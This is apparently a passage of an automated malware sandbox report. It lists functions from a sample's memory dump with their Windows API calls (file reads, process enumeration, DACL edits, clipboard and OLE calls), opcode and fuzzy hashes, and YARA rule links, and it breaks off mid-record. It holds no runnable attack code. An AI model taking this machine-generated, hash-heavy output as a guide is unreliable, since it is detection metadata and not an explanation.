                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: NamePath$FullShort
                            • String ID:
                            • API String ID: 4229621559-0
                            • Opcode ID: 0e9e33efa34fca7bc6f6ad378cbee4c1adce51ce80a5f2784ce22911b165735d
                            • Instruction ID: 0a1bb31294711167ed36df03e4da09481533b8b9ade7b6a7ccc01cae33dd30d0
                            • Opcode Fuzzy Hash: 0e9e33efa34fca7bc6f6ad378cbee4c1adce51ce80a5f2784ce22911b165735d
                            • Instruction Fuzzy Hash: AA119176B002489BCF10EB65D986E9AB3E9FF44350F10866AF819CB252DB71ED458B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEE492, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                              • Part of subcall function 00A9F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00A9F1F5,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00B390E8,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,?,00A9F1F5,?,?,00000001), ref: 00A9F23C
                            • GetPrivateProfileStringW.KERNEL32 ref: 00AEE501
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FullNamePathPrivateProfileString_malloc
                            • String ID:
                            • API String ID: 3364953200-0
                            • Opcode ID: 7ccac9bc51301bdcb9590b5ae2842090cde21e95724643c44d36d46c65054fe2
                            • Instruction ID: 548c4696c34a12158198137ab7d69c5ef89ed854acfd87fdc75b43d8b5133ad4
                            • Opcode Fuzzy Hash: 7ccac9bc51301bdcb9590b5ae2842090cde21e95724643c44d36d46c65054fe2
                            • Instruction Fuzzy Hash: 70017976A002497FCF10FB65DE89CEF77ACEF45710B004569B80997342DA70ED4586B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAF597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,00AA12DC,00000000,?,00AA6A7F,?,00AA12DC,00000000,00000000,00000000,?,00AA793E,00000001,00000214,?,00AA12DC), ref: 00AAF5DA
                              • Part of subcall function 00AA7E9A: __getptd_noexit.LIBCMT ref: 00AA7E9A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap__getptd_noexit
                            • String ID:
                            • API String ID: 328603210-0
                            • Opcode ID: 525958e6159ff652a4b483861e09181a6c44601703f9fc429d41b55aaeb28dc2
                            • Instruction ID: 4e4aba3af068a80f80d651a2a88efec0656e1724792abb2fac34b23357cc7a29
                            • Opcode Fuzzy Hash: 525958e6159ff652a4b483861e09181a6c44601703f9fc429d41b55aaeb28dc2
                            • Instruction Fuzzy Hash: 4101DF366002169FEB2D9FA5DC54B6B3794AF83760F168939E816CB1E0EB70CC01C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93B40, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00A93B92
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 73dea2c6e879bca241e67eef8e15ddd7d0c31787a692465c8c9532d2441ecd28
                            • Instruction ID: efde6d122abdc1f187837b6bcfccb73f1217ded6e0b542cafb2328738d6fa8e5
                            • Opcode Fuzzy Hash: 73dea2c6e879bca241e67eef8e15ddd7d0c31787a692465c8c9532d2441ecd28
                            • Instruction Fuzzy Hash: 0A11F576700B019FDF20CF55C894B67B7F8EB44750F10891EE59A87A50D770EA45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 5a15561e324f20b209c2c66c05fde8c1a2672573e3cfa11037fca088045765d4
                            • Instruction ID: 27f0b4b881278b78c131a7d6d9d78ad67c44ae5480a493475984242c70901d6d
                            • Opcode Fuzzy Hash: 5a15561e324f20b209c2c66c05fde8c1a2672573e3cfa11037fca088045765d4
                            • Instruction Fuzzy Hash: 58014C712006009FC724DF6CC942D27B3F4EF99744710886DE49AC7752EB32E801CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADC141, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00ADC17E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc_memmove
                            • String ID:
                            • API String ID: 1183979061-0
                            • Opcode ID: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                            • Instruction ID: 071ad31da35c0d6f9dca4706235d9e821048833fed656512d92517995e014e82
                            • Opcode Fuzzy Hash: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
                            • Instruction Fuzzy Hash: 18017C75200650AFC321AF58CA51D67B7F8EF9A750710885DF8DA87702DA35EC02CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA4B96, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __lock_file
                            • String ID:
                            • API String ID: 3031932315-0
                            • Opcode ID: 8d1b6afaa8842472f68533dd350de4015a19fd0cc579f2021f6102808a261315
                            • Instruction ID: 2b39a7ede67a0270189f282ded62cd7eaa3868edd869135d65ee3322f7198bf2
                            • Opcode Fuzzy Hash: 8d1b6afaa8842472f68533dd350de4015a19fd0cc579f2021f6102808a261315
                            • Instruction Fuzzy Hash: 1E015E71800219EBCF21AFA4CD0299E7F31AF4A760F008156F8245B0E1D3B28A72DFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFFD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcscpy
                            • String ID:
                            • API String ID: 3048848545-0
                            • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                            • Instruction ID: c973be0e98c10422b7f2e4e418a3e8a0954ee2b6dbeacf97cedd85f5ca406eda
                            • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                            • Instruction Fuzzy Hash: 29F0EC772142183A9E10AFA5AC42CF7B79CEF97370710062BF6549B181E662754583F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9ECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • CharUpperBuffW.USER32(?,?), ref: 00A9ED03
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: BuffCharUpper_malloc
                            • String ID:
                            • API String ID: 1573836695-0
                            • Opcode ID: f8d136ca888e38a67dfc1c723bd4f1c1c3d8f0a63a90b778dbb89741f05c0ff6
                            • Instruction ID: d7306345506bc2cb4e7ae24859c0982cfa016dd54c41c8e47c251bcc849cae76
                            • Opcode Fuzzy Hash: f8d136ca888e38a67dfc1c723bd4f1c1c3d8f0a63a90b778dbb89741f05c0ff6
                            • Instruction Fuzzy Hash: F7F0E7707006208BDF609F64A681666BBE4EF09B51F048199FC898F386C734DC01CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD3C1D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00AD3C38
                              • Part of subcall function 00AC3D83: EnumProcesses.PSAPI(?,00000800,?,?,00AD3C4D,?,?,?,00B38178), ref: 00AC3DA0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnumProcesses_wcslen
                            • String ID:
                            • API String ID: 3303492691-0
                            • Opcode ID: 19273351108e3adbd430afc72650d43a403131b15a651397b3d0ef556c66ae99
                            • Instruction ID: fed3d78b33654f9e996467658db18a8bb94503aad0d953036d1def82098ac2f8
                            • Opcode Fuzzy Hash: 19273351108e3adbd430afc72650d43a403131b15a651397b3d0ef556c66ae99
                            • Instruction Fuzzy Hash: 3BE0E5739010143BDB11664ABC81ECF735CDBC2225F044067F60A97201A221AE4582F2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • FindCloseChangeNotification.KERNELBASE(?,?,00AB6F2F), ref: 00A9D9DD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 36b8a0464e9455edd393f056b7540ffe691c8e8d1d1db4ef2d70a4d799b911fb
                            • Instruction ID: d56803cf3b45e710b4e748a9e4861429113d70d6ce610d3bcd2a89c0fc9d7758
                            • Opcode Fuzzy Hash: 36b8a0464e9455edd393f056b7540ffe691c8e8d1d1db4ef2d70a4d799b911fb
                            • Instruction Fuzzy Hash: 24E04EB4A00B009E87308F2AE444406FBF8AFE02213208E1FE4A6C2A64C3B4A1898F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 00A9E288
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: fb1ff88f946cb817592954d20d72571b72d45889b36c8ae1bd94409bbabc1b88
                            • Instruction ID: 04a58f8d95c737959593fc425a60bea4d7e6ca54596410b8a780940447fa9269
                            • Opcode Fuzzy Hash: fb1ff88f946cb817592954d20d72571b72d45889b36c8ae1bd94409bbabc1b88
                            • Instruction Fuzzy Hash: B0E01279600208BFC704DFA4DC45DAA7779E748601F008258FD01D7340D671AD5086A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC397D, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 00AC3984
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 76cf3f0ebf576cdf11fcad9c5a3f94448c9656269504c187aa1ca492bdc7f6ab
                            • Instruction ID: a72a95d60862ffcad19c84102dab675eb04604f02c4338c67546ebd4976099a8
                            • Opcode Fuzzy Hash: 76cf3f0ebf576cdf11fcad9c5a3f94448c9656269504c187aa1ca492bdc7f6ab
                            • Instruction Fuzzy Hash: 62C08C3208030C668E044BECB84DEE53B8C8942338B84AA40FD6DC75E1CA71BDA39650
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA17FA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            • _doexit.LIBCMT ref: 00AA1806
                              • Part of subcall function 00AA16BA: __lock.LIBCMT ref: 00AA16C8
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __lock_doexit
                            • String ID:
                            • API String ID: 368792745-0
                            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                            • Instruction ID: f67e7373258913ff4e7dbc1e79cf92cd012e95aec6c62f1fb546f834b9f41ce6
                            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                            • Instruction Fuzzy Hash: EFB0923258420833DA202542AC07F063A1A87C1B60E280120BA0C1A1E1AAA2A9618089
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA48E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction ID: b250e4d1656f499999971db3f812dd9ff9a674a29c3f3b35c3cc47ad1e37a7e8
                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction Fuzzy Hash: 60C09B7244014C77CF111942ED02F493F5997D5B60F144010FB1C191619677D56195D5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B0261D, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 00B0262C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FolderPath
                            • String ID:
                            • API String ID: 1514166925-0
                            • Opcode ID: 937e1641d905e60d64929df6200b876eda1c3e9e58bb692ecd761b53ca2545a4
                            • Instruction ID: 30c809d69e5e02dbd7d10846088fa1d5fbb533df9402ea713d67f5cb5af075c2
                            • Opcode Fuzzy Hash: 937e1641d905e60d64929df6200b876eda1c3e9e58bb692ecd761b53ca2545a4
                            • Instruction Fuzzy Hash: 52C09230A8C204FAFA204790CD8EF743A68B700B01F208080B309A90C0C6A068084A18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00AD602A, Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AC6DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AC6DCF
                              • Part of subcall function 00AC6DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00AC6DD9
                              • Part of subcall function 00AC6DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AC6DFF
                              • Part of subcall function 00AC6D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AC6D9C
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD6090
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD60C4
                            • GetLengthSid.ADVAPI32(?), ref: 00AD60D6
                            • GetAce.ADVAPI32(?,00000000,?), ref: 00AD6113
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD612F
                            • GetLengthSid.ADVAPI32(?), ref: 00AD6147
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD6170
                            • CopySid.ADVAPI32(00000000), ref: 00AD6177
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD61A9
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD61CB
                            • SetUserObjectSecurity.USER32 ref: 00AD61DE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                            • String ID:
                            • API String ID: 1255039815-0
                            • Opcode ID: 9db3621135573975e3e40d0ccf779b677d945b168252d635817f170f120cd99a
                            • Instruction ID: cdd9087edb1db6df7a9573c1499bbd2243ae86316980af605fe4097fdb86e4ff
                            • Opcode Fuzzy Hash: 9db3621135573975e3e40d0ccf779b677d945b168252d635817f170f120cd99a
                            • Instruction Fuzzy Hash: E5516D75900219ABDB10DFA5CC88FEEB7BDAF49740F04C609F516A7282DB35DA05CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEA0FC, Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: fd7677fc7a216d53fda7b739f76ec0e7c54139d3c7b620b5839e11d1df9e90cd
                            • Instruction ID: 1b4122af5c705c12edb90dcf10023a4114a247eed045df4dcac5f49fd83f6efb
                            • Opcode Fuzzy Hash: fd7677fc7a216d53fda7b739f76ec0e7c54139d3c7b620b5839e11d1df9e90cd
                            • Instruction Fuzzy Hash: D7418E72710205AFDB10EFA5EC8ABAEB7E4FF54311F108559F9098B2A1DB71AD11CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFC06C, Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
                            Download Yara Rule
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 00AFC0DC
                            • _wcslen.LIBCMT ref: 00AFC0EE
                            • CreateBindCtx.OLE32(00000000,?), ref: 00AFC198
                            • MkParseDisplayName.OLE32(?,?,?,?), ref: 00AFC1DE
